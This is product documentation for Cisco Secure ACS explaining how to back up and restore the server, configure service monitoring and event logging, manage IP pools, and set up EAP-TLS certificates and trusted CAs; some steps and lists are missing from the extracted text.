Cisco Secure ACS Backup

This section provides information about the Cisco Secure ACS Backup feature, including procedures for implementing this feature. This section contains the following topics:

About Cisco Secure ACS Backup

The ACS Backup process backs up your Cisco Secure ACS system information to a file on the local hard drive. You can manually back up the Cisco Secure ACS system. You can also establish automated backups that occur at regular intervals or at selected days of the week and times. Maintaining backup files can minimize downtime if system information becomes corrupt or is misconfigured. We recommend copying the files to another system's hard drive in case the hardware fails on the primary system.

For information about using a backup file to restore Cisco Secure ACS, see the "Cisco Secure ACS System Restore" section.

Backup File Locations

The default directory for backup files is the following:

where drive is the local drive where you installed Cisco Secure ACS and path is the path from the root of drive to the Cisco Secure ACS directory. For example, if you installed Cisco Secure ACS Version 3.0 in the default location, the default backup location would be:

The filename given to a backup is determined by Cisco Secure ACS. For more information about filenames assigned to backup files generated by Cisco Secure ACS, see the "Backup File Names and Locations" section.

Directory Management

You can configure the number of backup files to keep and the number of days after which backup files are deleted. The more complex your configuration and the more often you back up the system, the more diligent we recommend you be about clearing out old databases from the Cisco Secure ACS server hard drive.

Components Backed Up

The ACS System Backup utility backs up the Cisco Secure ACS user database and information from the Windows Registry that is relevant to Cisco Secure ACS. The user database backup includes all user information, such as username, password, and other authentication information, including server certificates and the certificate trust list. The Windows Registry information includes any system information that is stored in the Windows Registry, such as NDG information, AAA client configuration, and administrator accounts.

Reports of Cisco Secure ACS Backups

When a system backup takes place, whether it was manually generated or scheduled, the event is logged in the Administration Audit report and the ACS Backup and Restore report. You can view recent reports in the Reports and Activity section of Cisco Secure ACS.

For more information about Cisco Secure ACS reports, see "Working with Logging and Reports."

Performing a Manual Cisco Secure ACS Backup

You can backup Cisco Secure ACS whenever you want, without scheduling the backup.

To perform an immediate backup of Cisco Secure ACS, follow these steps:

Step 2   Click ACS Backup.

Result: The ACS System Backup Setup page appears.

Step 3   In the Directory box under Backup Location, type the drive and path to the directory on a local hard drive where you want the backup file to be written.

Step 4   Click Backup Now.

Result: Cisco Secure ACS immediately begins a backup.

Scheduling Cisco Secure ACS Backups

You can schedule Cisco Secure ACS backups to occur at regular intervals or at selected days of the week and times.

To schedule the times at which Cisco Secure ACS performs a backup, follow these steps:

Step 2   Click ACS Backup.

Result: The ACS System Backup Setup page appears.

Step 3   To schedule backups at regular intervals, under ACS Backup Scheduling, select the Every X minutes option and in the X box type the length of the interval at which Cisco Secure ACS should perform backups.

---

Note    Because Cisco Secure ACS is momentarily shut down during backup, if the backup interval is set too low, users might be unable to authenticate.

---

Step 4   To schedule backups at specific times, follow these steps:

Tip Clicking times of day on the graph selects those times; clicking again clears them. At any time you can click Clear All to clear all hours, or you can click Set All to select all hours.

Step 5   To change the location where Cisco Secure ACS writes backup files, type the drive letter and path in the Directory box.

Step 6   To manage which backup files Cisco Secure ACS keeps, follow these steps:

Step 7   Click Submit.

Result: Cisco Secure ACS implements the backup schedule you configured.

Disabling Scheduled Cisco Secure ACS Backups

You can disable scheduled Cisco Secure ACS backups without losing the schedule itself. This allows you to cease scheduled backups temporarily and later resume them without having to re-enter the schedule information.

To disable a scheduled backup, follow these steps:

Step 2   Click ACS Backup.

Result: The ACS System Backup Setup page appears.

Step 3   Under ACS Backup Scheduling, select the Manual option.

Step 4   Click Submit.

Result: Cisco Secure ACS does not continue any scheduled backups. You can still perform manual backups as needed.

Cisco Secure ACS System Restore

This section provides information about the Cisco Secure ACS System Restore feature, including procedures for restoring your Cisco Secure ACS server from a backup file. This section contains the following topics:

About Cisco Secure ACS System Restore

The ACS System Restore feature enables you to restore your system configuration from backup files generated by the ACS Backup feature. This feature helps minimize downtime if Cisco Secure ACS system information becomes corrupted or is misconfigured.

The ACS System Restore feature only works with backup files generated by a Cisco Secure ACS server running an identical release of Cisco Secure ACS, including patch level.

Backup File Names and Locations

The ACS System Restore feature restores the Cisco Secure ACS user database and Cisco Secure ACS Windows Registry information from a file that was created by the ACS Backup feature. Cisco Secure ACS writes backup files only on the local hard drive. You can restore from any backup file you select. For example, you can restore from the latest backup file, or if you suspect that the latest backup was incorrect, you can select an earlier backup file to restore from.

The backup directory is selected when you schedule backups or perform a manual backup. The default directory for backup files is the following:

where drive is the local drive where you installed Cisco Secure ACS and path is the path from the root of drive to the Cisco Secure ACS directory. For example, if you installed Cisco Secure ACS Version 3.0 in the default location, the default backup location would be:

Cisco Secure ACS creates backup files using the date and time format:

where:

For example, if Cisco Secure ACS started a backup on October 13, 1999, 11:41:35 a.m., Cisco Secure ACS would generate a backup file named:

If you are not sure of the location of the latest backup file, check your scheduled backup configuration on the ACS Backup page.

Components Restored

You can select the components to restore: the user and group databases, the system configuration, or both.

Reports of Cisco Secure ACS Restorations

When a Cisco Secure ACS system restoration takes place, the event is logged in the Administration Audit report and the ACS Backup and Restore report. You can view recent reports in the Reports and Activity section of Cisco Secure ACS.

For more information about Cisco Secure ACS reports, see "Working with Logging and Reports."

Restoring Cisco Secure ACS from a Backup File

You can perform a system restoration of Cisco Secure ACS whenever needed.

Note   Using the Cisco Secure ACS System Restore feature restarts all Cisco Secure ACS services and logs out all administrators.

To restore Cisco Secure ACS from a backup file generated by the Cisco Secure ACS Backup feature, follow these steps:

Step 2   Click ACS Restore.

Result: The ACS System Restore Setup page appears.

The Directory box displays the drive and path to the backup directory most recently configured in the Directory box on the ACS Backup page.

Beneath the Directory box, Cisco Secure ACS displays the backup files in the current backup directory. If no backup files exist, <No Matching Files> appears in place of file names.

Step 3   To change the backup directory, type the new drive and path to the backup directory in the Directory box, and then click OK.

Result: Cisco Secure ACS displays the backup files, if any, in the backup directory you specified.

Step 4   In the list below the Directory box, select the backup file you want to use to restore Cisco Secure ACS.

Step 5   To restore user and group database information, select the User and Group Database check box.

Step 6   To restore system configuration information, select the CiscoSecure ACS System Configuration check box.

Step 7   Click Restore Now.

Result: Cisco Secure ACS displays a confirmation dialog box indicating that performing the restoration will restart Cisco Secure ACS services and log out all administrators.

Step 8   To continue with the restoration, click OK.

Result: Cisco Secure ACS restores the system components specified using the backup file you selected. The restoration should require several minutes to complete, depending on which components you selected to restore and the size of your database.

When the restoration is complete, you can log in again to Cisco Secure ACS.

Cisco Secure ACS Active Service Management

ACS Active Service Management is an application-specific service monitoring tool that is tightly integrated with ACS. The ACS Active Service Management comprises two features:

System Monitoring

Cisco Secure ACS system monitoring enables you to determine how often Cisco Secure ACS tests its authentication and accounting processes, and what automated actions it takes should tests detect a failure of these processes.

System Monitoring Options

You have the following options for configuring system monitoring:

When this option is enabled, at the interval defined, Cisco Secure ACS tests authentication and accounting. If Cisco Secure ACS detects a failure, it restarts the failed service and retests authentication and accounting. If the second test fails, Cisco Secure ACS performs the action identified in the on failure list. If, after the failure action is performed, testing still fails, Cisco Secure ACS performs event logging. For more information about event logging, see the "Setting Up Event Logging" section.

where drive is the local drive where you installed Cisco Secure ACS and path is the path from the root of drive to the Cisco Secure ACS directory.

Setting Up System Monitoring

To setup Cisco Secure ACS System Monitoring, follow these steps:

Step 2   Click ACS Service Management.

Result: The ACS Active Service Management Setup page appears.

Step 3   To have Cisco Secure ACS test the login process, follow these steps:

Step 4   To have Cisco Secure ACS generate a Windows event when a user attempts to login to your network using a disabled account, select the Generate event when an attempt is made to log in to a disabled account check box.

Step 5   If you want to setup event logging, proceed to the "Setting Up Event Logging" section.

Step 6   If you are done setting up Cisco Secure ACS Service Management, click Submit.

Result: Cisco Secure ACS implements the service management settings you made.

Event Logging

The Event Logging feature enables you to configure whether Cisco Secure ACS logs events to the Windows event log and whether Cisco Secure ACS generates an e-mail when an event occurs. Cisco Secure ACS detects events using the System Monitoring feature. For more information about system monitoring, see the "System Monitoring Options" section.

Setting Up Event Logging

To view the Windows NT/2000 event log, choose Start > Administrative Tools > Event Viewer. For more information about the Windows event log or Event Viewer, refer to your Microsoft Windows documentation.

To setup Cisco Secure ACS event logging, follow these steps:

Step 2   Click ACS Service Management.

Result: The ACS Active Service Management Setup page appears.

Step 3   To have Cisco Secure ACS send all events to the Windows event log, select Log all events to the NT Event log.

Step 4   To have Cisco Secure ACS send an e-mail when an event occurs, follow these steps:

---

Note    Do not use underscores in the e-mail addresses you type in this box.

---

---

Note    The SMTP mail server must be operational and must be available from the Cisco Secure ACS server.

---

Step 5   If you want to setup system monitoring, proceed to the "Setting Up System Monitoring" section.

Step 6   If you are done setting up Cisco Secure ACS Service Management, click Submit.

Result: Cisco Secure ACS implements the service management settings you made.

IP Pools Server

The IP Pools Server feature enables you to assign the same IP address to multiple users, provided that the users are on different segments of the network. This means you can re-use IP addresses and reduce the number of IP addresses on your network. When you enable this feature, Cisco Secure ACS dynamically issues IP addresses from the IP pools you have defined by number or name. You can configure up to 999 IP pools, for approximately 255,000 users.

If you are using IP pooling and proxy, all accounting packets are proxied so that the Cisco Secure ACS that is assigning the IP addresses can confirm whether an IP address is already in use.

To use IP pools, the AAA client must have network authorization (aaa authorization network) and accounting (aaa accounting) enabled.

Note   To use the IP Pools feature, you must set up your AAA client to perform authentication and accounting using the same protocol—either TACACS+ or RADIUS.

For information on assigning a group or user to an IP pool, see the "Setting IP Address Assignment Method for a User Group" section or the "Assigning a User to a Client IP Address" section.

Allowing Overlapping IP Pools or Forcing Unique Pool Address Ranges

Cisco Secure ACS provides automated detection of overlapping pools.

Note    To use overlapping pools, you must be using RADIUS with virtual private networking, and you cannot be using Dynamic Host Configuration Protocol (DHCP).

You can determine whether overlapping IP pools are currently allowed by checking which button appears below the AAA Server IP Pools table:

To allow overlapping IP pools or to force unique pool address ranges, follow these steps:

Step 2   Click IP Pools Server.

---

Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the IP Pools check box.

---

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   If you want to allow overlapping IP pool address ranges, follow these steps:

Result: Cisco Secure ACS allows overlapping IP pool address ranges.

Cisco Secure ACS already allows overlapping IP pool address ranges.

Step 4   If you want to deny overlapping IP pool address ranges, follow these steps:

Cisco Secure ACS already does not permit overlapping IP pool address ranges.

Result: Cisco Secure ACS does not permit overlapping IP pool address ranges.

Refreshing the AAA Server IP Pools Table

You can refresh the AAA Server IP Pools table. This allows you to get the latest usage statistics for your IP pools.

To refresh the AAA Server IP Pools table, follow these steps:

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click Refresh.

Result: Cisco Secure ACS updates the percentages of pooled addresses in use.

Adding a New IP Pool

You can define up to 999 IP address pools.

To add an IP pool, follow these steps:

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have already configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click Add Entry.

Result: The New Pool table appears.

Step 4   In the Name box, type the name you want to assign to the new IP pool.

Step 5   In the Start Address box, type the lowest IP address of the range of addresses for the new pool.

---

Note    All addresses in an IP pool must be on the same Class C network, so the first three octets of the start and end addresses must be the same. For example, if the start address is 192.168.1.1, the end address must be between 192.168.1.2 and 192.168.1.254.

---

Step 6   In the End Address box, type the highest IP address of range of addresses for the new pool.

Step 7   Click Submit.

Result: The new IP pool appears in the AAA Server IP Pools table.

Editing an IP Pool Definition

To edit an IP pool definition, follow these steps:

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click the name of the IP pool you need to edit.

Result: The name pool table appears, where name is the name of the IP pool you selected. The In Use field displays the number of IP addresses of this pool that are currently allocated to a user. The Available field displays the number of IP addresses currently unallocated to users.

Step 4   To change the name of the pool, in the Name box, type the name to which you want to change the IP pool.

Step 5   To change the starting address of the pool range of IP addresses, in the Start Address box, type the lowest IP address of the new range of addresses for the pool.

---

Note    All addresses in an IP pool must be on the same Class C network, so the first three octets of the start and end addresses must be the same. For example, if the start address is 192.168.1.1, the end address must be between 192.168.1.2 and 192.168.1.254.

---

Step 6   To change the ending address of the pool range of IP addresses, in the End Address box, type the highest IP address of the new range of addresses for the pool.

Step 7   Click Submit.

Result: The edited IP pool appears in the AAA Server IP Pools table.

Resetting an IP Pool

The Reset function recovers IP addresses within an IP pool when there are "dangling" connections. A dangling connection results from a user disconnecting without Cisco Secure ACS receiving an accounting stop packet. If the Failed Attempts log in Reports and Activity shows a large number of "Failed to Allocate IP Address For User" messages, consider using the Reset function to reclaim all allocated addresses in this IP pool.

Note   Using the Reset function to reclaim all allocated IP addresses in a pool can result in users being assigned addresses that are already in use.

To reset an IP pool and reclaim all its IP addresses, follow these steps:

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click the name of the IP pool you need to reset.

Result: The name pool table appears, where name is the name of the IP pool you selected. The In Use field displays the number of IP addresses of this pool that are currently assigned to a user. The Available field displays the number of IP addresses currently not assigned to users.

Step 4   Click Reset.

Result: Cisco Secure ACS displays a dialog box indicating the possibility of assigning users addresses that are already in use.

Step 5   To continue resetting the IP pool, click OK.

Result: The IP pool is reset. All its IP addresses are reclaimed. In the In Use column of the AAA Server IP Pools table, zero percent of the IP pool's addresses are assigned to users.

Deleting an IP Pool

Note   If you delete an IP pool that has users assigned to it, those users cannot authenticate until you edit the user profile and change their IP assignment settings. Alternately, if the users receive their IP assignment based on group membership, you can edit the user group profile and change the IP assignment settings for the group.

To delete an IP pool, follow these steps:

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click the name of the IP pool you need to delete.

Result: The name pool table appears, where name is the name of the IP pool you selected. The In Use column displays the number of IP addresses of this pool that are currently assigned to a user. The Available column displays the number of IP addresses currently not assigned to users.

Step 4   Click Delete.

Result: Cisco Secure ACS displays a dialog box to confirm that you want to delete the IP pool.

Step 5   To continue with deleting the IP pool, click OK.

Result: The IP pool is deleted. The AAA Server IP Pools table does not list the deleted IP pool.

IP Pools Address Recovery

The IP Pools Address Recovery feature enables you to recover assigned IP addresses that have not been used for a specified period of time. If Cisco Secure ACS is to reclaim the IP addresses correctly, an accounting network must be configured on the AAA client.

Enabling IP Pool Address Recovery

To enable IP pool address recovery, follow these steps:

Step 2   Click IP Pools Address Recovery.

---

Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the IP Pools check box.

---

Result: The IP Address Recovery page appears.

Step 3   Select the Release address if allocated for longer than X hours check box and in the X box type the number of hours after which Cisco Secure ACS should recover assigned, unused IP addresses.

Step 4   Click Submit.

Result: Cisco Secure ACS implements the IP pools address recovery settings you made.

VoIP Accounting Configuration

The VoIP Accounting Configuration feature enables you to specify which accounting logs receive VoIP accounting data. There are three options for VoIP accounting:

Configuring VoIP Accounting

Note   The VoIP Accounting Configuration feature does not enable VoIP accounting. To enable VoIP accounting, see "Working with Logging and Reports."

To configure VoIP accounting, follow these steps:

Step 2   Click VoIP Accounting Configuration.

---

Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the Voice-over-IP (VoIP) Accounting Configuration check box.

---

Result: The VoIP Accounting Configuration page appears. The Voice-over-IP (VoIP) Accounting Configuration table displays the options for VoIP accounting.

Step 3   Select the VoIP accounting option you want.

Step 4   Click Submit.

Result: Cisco Secure ACS implements the VoIP accounting configuration you specified.

Cisco Secure ACS Certificate Setup

Cisco Secure ACS provides an Extended Authentication Protocol Transport Level Security (EAP-TLS) feature for user authentication using digital certificates in RADIUS. With EAP-TLS, the same enterprise PKI (public key infrastructure) system and user certificates deployed for secure e-mail, Internet, or desktop security can be used for RADIUS user authentication.

Background on Certification

EAP and TLS are both IETF RFC standards. The EAP protocol extends the network point-to-point protocol (PPP) by providing new methods for carrying authentication information before establishing PPP connections, specifically, EAPOL (the encapsulation of EAP over LANs as established by IEEE 802.1X). In addition to digital certificates, EAP has methods for username and password authentication (that is, EAP-MD5 Challenge). TLS is the next generation SSL security protocol. TLS provides a way to use certificates for both user authentication, and for dynamic ephemeral session key generation. For more detailed information on EAP, TLS, and EAP-TLS, refer to the following IETF RFCs: PPP Extensible Authentication Protocol (EAP) RFC 2284, The TLS Protocol RFC 2246, and PPP EAP TLS Authentication Protocol RFC 2716.

Digital certificates are particularly useful because they do not require the sharing of secrets nor stored database credentials, can be scaled and trusted over large deployments, and can serve as a "two-factor" method of authentication that is stronger and more secure than shared secret systems. Mutual trust requires that Cisco Secure ACS have an installed certificate that can be verified by AAA clients and that a user attempting authentication via EAP-TLS bears a certificate from a trusted certification authority (CA). For authentication of a user to occur, the subject name contained in the user certificate must be identical to the username in the Cisco Secure ACS database (or the external LDAP Directory or Windows 2000 database that Cisco Secure ACS uses). Cisco Secure ACS requires that certificates and CA files used be in Base64-encoded X.509 version 3.

A user who is authenticated using EAP-TLS can then be mapped to user or group authorization information kept in the CiscoSecure user database, or in the Windows 2000 or generic LDAP Directory Server. Your Cisco Secure ACS must be installed on a Windows 2000 server (not Windows NT) if you intend to use EAP-TLS in conjunction with a Windows 2000 user database.

EAP-TLS requires support from both the end client and the AAA client. An example of an EAP-TLS client includes the Windows XP operating system; EAP-TLS compliant AAA clients include Cisco 802.1x-enabled switch platforms (such as the Catalyst 6000 product line), and Cisco Aironet Wireless solutions. In addition, Cisco Secure ACS needs to generate or enroll into an existing PKI and be granted an X.509 v3 digital certificate.

EAP-TLS Setup Overview

This section outlines the basic steps necessary to implement EAP-TLS in Cisco Secure ACS.

Requirements for Certificate Enrollment

Cisco Secure ACS supports a variety of PKIs for digital certificate enrollment. To use the ACS general certificate enrollment feature, the following conditions apply:

This section contains procedures for the following subjects:

Generating a Request for a Certificate

You perform this generation procedure to create an RSA key pair for the server and a new digital certificate for Cisco Secure ACS, and to send information to a CA, requesting that they assign the server certificate for your Cisco Secure ACS. All EAP-TLS authentications require certificates from both the end-user clients and the Cisco Secure ACS(s) configured for EAP-TLS support. To obtain a server certificate, you can either import an existing server certificate into Cisco Secure ACS, or generate a new one. You do not need to perform this procedure from within Cisco Secure ACS if you have alternative means of generating a certificate request (including producing private and public key pairs). Note that one server certificate may be used for more than one Cisco Secure ACS by exporting the certificate and keypair from one server and importing this credential into additional Cisco Secure ACS(s).

Note   If you are using a file to install a certificate in Cisco Secure ACS, the certificate must comply with the X.509 version 3 digital certificate standard.

To request a certificate for manual enrollment, follow these steps:

Step 2   Click ACS Certificate Setup.

Result: If you are accessing this page for the first time, Cisco Secure ACS displays the Install new certificate table on the ACS Certificate Setup page. (If you have already installed a server certificate, information on it is displayed.)

Step 3   Select the Manual certificate enrollment option.

Step 4   To have Cisco Secure ACS generate a certificate signing request (CSR), follow these steps:

Tip This private key is used later in the certificate installation process.

Tip The choices for Key length are 512 or 1024 bits. The default and more secure choice is 1024 bits.

Tip The choices for Digest to sign with are MD2, MD5, SHA, and SHA1. The default is SHA1.

Step 5   Click Submit.

Result: Cisco Secure ACS prepares a certification signing request and displays it in the display area, on the right, under a banner that reads:

Step 6   Open a browser window and navigate to the web site of your CA. Then copy the encoded certificate signing request from Cisco Secure ACS and paste it into the CA submission form, as applicable.

Result: The CA receives the request and issues a certificate.

Tip Typically, the CA generates the certificate and provides the means for you to download it.

Installing Cisco Secure ACS Certification with Manual Enrollment

You perform this procedure to install a Cisco Secure ACS certificate.

Before You Begin

You must have a server certificate for your Cisco Secure ACS before you can install it. You can use the procedure in the "Generating a Request for a Certificate" section, or any other means to obtain a certificate for manual installation.

If you are using Microsoft Windows 2000 Certificate Services to obtain your server certificate, you can do it using the procedure in the "Installing Cisco Secure ACS Certification with Automatic Enrollment" section, or you can generate the request using the MS Certificate Services web interface. For more information refer to the "EAP-TLS Deployment Guide," which can be found on the Cisco Secure ACS Product Literature site:

http://www.cisco.com/warp/public/cc/pd/sqsw/sq/prodlit/index.shtml

To install an existing certificate for use on Cisco Secure ACS, follow these steps:

Step 2   Click ACS Certificate Setup.

Result: Cisco Secure ACS displays the Install new certificate table on the ACS Certificate Setup page.

Step 3   Select the Manual certificate enrollment option.

Step 4   Select the Use existing certificate option.

Step 5   You must specify whether the system should read the certificate from a specified file or use a certificate already in storage on the local machine. Do one of the following:

Step 6   If you generated the request using Cisco Secure ACS, in the Private key file box, type the full directory path and name of the file that contains the private key.

---

Note    If the certificate was installed in storage with the private key, you do not have the private key file and do not need to type it.

---

Tip This is the private key associated with the server certificate.

Step 7   In the Private key password box, type the private key password.

Step 8   Click Submit.

Result: To show that the certificate setup is complete, Cisco Secure ACS displays the Installed Certificate Information table, which contains the following certificate information:

Installing Cisco Secure ACS Certification with Automatic Enrollment

You can use this process to install ACS certification using your existing Microsoft enterprise CA.

Before You Begin

To employ the Cisco Secure ACS automatic certificate enrollment feature, the following conditions apply:

To use automatic enrollment to install a new ACS certificate, follow these steps:

Step 2   Click ACS Certificate Setup.

Result: Cisco Secure ACS displays the Install new certificate table on the ACS Certificate Setup page.

Note   If your Cisco Secure ACS has already been enrolled with a certificate, you will not see the Install new certificate table. Rather, you would see the Installed Certificate Information table.

Step 3   Select the Automatic certificate enrollment option in the lower portion of the page.

Step 4   To specify the Microsoft CA, under Microsoft Windows 2000 Certificate Services, follow these steps:

Step 5   In the Administrative login box, type the login name.

Step 6   In the Password box, type the password.

Step 7   Click Submit.

Result: To show that the certificate setup is complete, Cisco Secure ACS displays the Installed Certificate Information table, which contains the following certificate information:

Performing Cisco Secure ACS Certification Update or Replacement

You can use this process to update or replace an existing Cisco Secure ACS certificate that is out-of-date or out-of-order.

Warning This procedure eliminates your existing Cisco Secure ACS certificate.

To install a new ACS certificate, follow these steps:

Step 2   Click ACS Certificate Setup.

Result: Cisco Secure ACS displays the Installed Certificate Information table on the ACS Certificate Setup page.

Note   If your Cisco Secure ACS has not already been enrolled with a certificate, you do not see the Installed Certificate Information table. Rather, you see the Install new certificate table. If this is the case, you can proceed to Step 5.

Step 3   Click Enroll New Certificate.

Result: A confirmation dialog box appears.

Step 4   To confirm that you intend to enroll a new certificate, click OK.

Result: The existing Cisco Secure ACS certificate is removed.

Step 5   You can now install the replacement certificate in the same manner as an original certificate. For detailed procedural information, see the "Installing Cisco Secure ACS Certification with Manual Enrollment" section or the "Installing Cisco Secure ACS Certification with Automatic Enrollment" section.

Certification Authority Setup

Cisco Secure ACS comes preconfigured with a list of popular CAs, none of which are enabled until you explicitly signify trustworthiness. To specify one or more CAs as trusted for user certification, you perform the procedure in the "Editing the Certificate Trust List" section.

You perform the procedure in the "Adding a New CA Certificate to Local Certificate Storage" section to add a new CA to your certificate trust list (CTL).

Cisco Secure ACS uses the CTL to verify the client certificates. Only certificates that were issued by a CA that exists in the Cisco Secure ACS CTL are trusted by Cisco Secure ACS. If all the clients and Cisco Secure ACS are getting their certificates from the same CA you do not need to add any CA to the CTL because Cisco Secure ACS automatically trusts the CA that issues its certificate. You do need to install the certificate for the CA that issued the Cisco Secure ACS Server Certificate, but there is no need to add it to the CTL.

This section contains procedures for the following subjects:

Trust Requirements and Models

TLS authentications require two elements of trust. The first element of trust is when the TLS negotiation establishes end-user trust by validating, through RSA signature verifications, that the user is in possession of a keypair signed by a certificate. This verifies that the end user is the legitimate keyholder for a given digital certificate and corresponding user identification contained in the certificate. However, trusting that a user is in possession of a certificate only provides a username/keypair binding. The second element of trust is to use a third-party signature (usually from a CA) that verifies the information in a certificate. This third-party binding is similar to the real world equivalent of the U.S. Passport seal on your passport. You trust the passport because you trust the preparation and identity checking that the passport office made when creating that passport. You trust digital certificates by installing the root certificate CA signature in an equivalent way.

How you edit your CTL determines the type of trust model you have. Many employ a restricted trust model wherein very few, privately controlled CAs are trusted. This model provides the highest level of security but restricts adaptability and expandability. The alternative, an open trust model, allows for more CAs or public CAs. This open trust model trades off increased security for greater adaptability and expandability.

We recommend that you fully understand the implications of your trust model before editing the CTL in Cisco Secure ACS.

Editing the Certificate Trust List

You use this procedure to add CAs to or remove CAs from your CTL.

To edit the CTL, follow these steps:

Step 2   Click Certification Authority Setup.

Result: Cisco Secure ACS displays the CA Operations table.

Step 3   To edit the certificate trust list, click Edit certificate trust list.

Result: The system displays the Edit the Certificate Trust List (CTL) table.

Warning Adding a public CA that you do not control may reduce your system security. For more information, see the "Trust Requirements and Models" section.

Step 4   To add a CA to your CTL, select corresponding check box.

Tip You can select, or deselect, as many CAs as you want.

Step 5   Click Submit.

Result: Cisco Secure ACS adds (or removes) the specified CA to (or from) the CTL.

Adding a New CA Certificate to Local Certificate Storage

Use this procedure to add a new certificate to local certificate storage.

You must perform this procedure for the CA that issued your server certificate to distinguish it from CAs trusted to issue user certification.

Note   Cisco Secure ACS requires that the certificate and CA files be in Base64-encoded X.509. You can also add the CA certificate by installing it outside of Cisco Secure ACS (in Windows). After you install it, you should be able to see the new CA in the CA list from within Cisco Secure ACS.

To add a new CA certificate to local certificate storage, follow these steps:

Step 2   Click Certification Authority Setup.

Result: Cisco Secure ACS displays the CA Operations table.

Step 3   In the CA file name box, type the full directory path and name of the CA certificate file.

Step 4   Click Submit.

Result: Cisco Secure ACS displays the following message in the display area on the right:

After you have installed a certificate in Cisco Secure ACS and added the required CAs, you can configure EAP-TLS in Global Authentication Setup and then restart Cisco Secure ACS.

Global Authentication Setup

Use this procedure to select and configure how Cisco Secure ACS handles extended options for authentication. In particular, you use this procedure to allow either EAP-MD5 or EAP-TLS, and to allow either MS-CHAP Version 1 or MS-CHAP Version 2, or both.

To configure authentication options, follow these steps:

Step 2   Click Global Authentication Setup.

Result: Cisco Secure ACS displays the Global Authentication Setup page.

Step 3   In the EAP Configuration table, select one of the following options:

Step 4   In the MS-CHAP Configuration table, select each version of MS-CHAP that you want to allow for Cisco Secure ACS. Your choices are the following:

Step 5   Click Submit + Restart.

Result: Cisco Secure ACS restarts its services and implements the authentication configuration options you selected.